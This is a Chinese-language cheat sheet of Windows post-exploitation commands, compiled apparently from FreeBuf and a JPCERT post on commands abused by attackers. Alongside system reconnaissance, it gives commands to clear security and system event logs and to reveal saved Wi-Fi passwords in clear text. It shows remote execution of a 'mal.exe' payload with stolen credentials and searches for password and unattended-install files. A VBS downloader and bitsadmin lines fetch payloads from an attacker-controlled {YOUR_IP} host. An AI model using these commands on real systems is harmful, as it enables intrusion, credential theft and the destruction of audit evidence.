My

命令行下收集主机信息
使用wmic识别安装到系统中的补丁情况：　　wmic qfe get description,installedOn
识别正在运行的服务： 　　sc query type= service
识别开机启动的程序，包括路径：　　net start   wmic startup list full
ping探测存活主机　　　D:\>for /L %I in (100,1,254) DO @ping -w 1 -n 1 10.18.180.%I | findstr "TTL=" >> pinglive.txt
查看系统中网卡的IP地址和MAC地址： 　　D:\>wmic nicconfig get ipaddress,macaddress
查看当前系统是否有屏保保护，延迟是多少: 　　wmic desktop get screensaversecure,screensavertimeout
查看系统中开放的共享 ：　　D:\>wmic share get name,path  D:\>net share
查看系统中开启的日志 ： 　　C:\>wmic nteventlog get path,filename,writeable
清除相关的日志（这里是全部清除）
　　wevtutil cl "windows powershell"
　　wevtutil cl "security"
　　wevtutil cl "system"
查看系统中安装的软件以及版本： 　　C:\>wmic product get name,version
查看某个进程的详细信息 （路径，命令行参数等）： 　　C:\>wmic process where name="chrome.exe" list full
终止一个进程
　　D:\>wmic process where name="xshell.exe" call terminate
　　D:\>ntsd -c q -p 进程的PID
显示系统中的曾经连接过的无线密码
　　D:\>netsh wlan show profiles
　　D:\>netsh wlan show profiles name="profiles的名字" key=clear
查看当前系统是否是VMWARE: C:\>wmic bios list full | find /i "vmware"

　远程执行命令

　　at \\[remote host name or IP address] 12:00 cmd /c "C:\windows\temp\mal.exe"

　　wmic /node:[IP address] /user:”[user name]” /password:”[password]” process call create “cmd /c c:\Windows\System32\net.exe user”

Freebuf引用

1.获取操作系统信息

识别操作系统名称及版本：

　　中文系统：systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

　　英文系统：systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"

查看所有环境变量： SET
识别系统体系结构： echo %PROCESSOR_ARCHITECTURE%

2.获取网络信息

查看路由表信息：route print

查看ARP缓存信息： arp -A

查看防火墙规则：

netstat -ano
netsh firewall show config
netsh firewall show state 

3.应用程序及服务信息

查看计划任务： schtasks /QUERY /fo LIST /v

　　　中文系统调整GBK编码为437美国编码：chcp 437

　　　然后：schtasks /QUERY /fo LIST /v

查看服务进程ID：tasklist /SVC

查看安装驱动： driverquery

查看安装程序和版本信息（漏洞利用线索）：wmic product list brief

查看服务、进程和启动程序信息：

　　wmic service list brief
　　wmic process list brief
　　wmic startup list brief

查看.msi程序的执行权限：

　　reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
　　reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

查看是否设置有setuid和setgid：

　　reg query HKEY_Local_Machine\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits

查看安装补丁和时间信息：

　　wmic qfe get Caption,Description,HotFixID,InstalledOn

查看特定漏洞补丁信息：

　　wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"

4.敏感数据和目录

查找密码文件或其它敏感文件：

　　dir /b/s password.txt
　　dir /b/s config.*
　　findstr /si password *.xml *.ini *.txt
　　findstr /si login *.xml *.ini *.txt

无人值守安装文件：

这些文件通常包含base64模式的密码信息。这类文件在一些大型企业网络或GHO系统中可以发现，文件通常的位置如下：

C:\sysprep.inf
C:\sysprep\sysprep.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml

5.文件系统

可以通过调用系统预安装程序语言查看当前可访问目录或文件权限，如python下：

import os; os.system("cmd /c {command here}")

使用copy con命令创建ftp执行会话：

范例

>copy con ftp.bat #创建一个名为ftp.bat的批处理文件

ftp # 输入执行会话名称，按回车到下一行，之后按CTRL+Z结束编辑，再按回车退出

> ftp.bat # 执行创建的文件

ftp> # 执行ftp命令

ftp> !{command} # e.g. - !dir or !ipconfig

使用copy con命令创建VBS脚本文件：

> copy con commandExec.vbs #创建VBS脚本文件

　　Call WScript.CreateObject(, True) #VBS文件内容

> commandExec.vbs #执行脚本文件

检查文件夹可写状态： dir /a-r-d /s /b

6.一个有用的文件上传脚本

' downloadfile.vbs 

' Set your settings

strFileURL = "http://{YOUR_IP}/{FILE_NAME.EXT}"

strHDLocation = "c:\\{FILE_NAME.EXT}"

' Fetch the file

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false

objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then

Set objADOStream = CreateObject("ADODB.Stream")

objADOStream.Open

objADOStream.Type = 1 'adTypeBinary

objADOStream.Write objXMLHTTP.ResponseBody

objADOStream.Position = 0 'Set the stream position to the start

Set objFSO = Createobject("Scripting.FileSystemObject")

If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation

Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation

objADOStream.Close

Set objADOStream = Nothing

End if

Set objXMLHTTP = Nothing

该脚本是一个社区发布的，你可以以下这种方式运行它：

(1)cscript.exe downloadfile.vbs

(2)bitsadmin命令　 如果目标系统是Win7及以上操作系统，可以使用bitsadmin命令，bitsadmin是一个命令行工具，可用于创建下载上传进程：
 　　　　bitsadmin /transfer job_name /download /priority priority URL local\path\file
 　　　　bitsadmin /transfer mydownloadjob /download /priority normal ^ http://{YOUR_IP}/{FILE_NAME.EXT} C:\path\download.exe
　 如：bitsadmin /transfer n http://download.fb.com/file/xx.zip c:\pentest\xx.zip

参考链接

　　SourceURL:http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

　　http://www.freebuf.com/articles/system/114731.html

　　http://www.91ri.org/7894.html　　Windows渗透与提权：技巧总结篇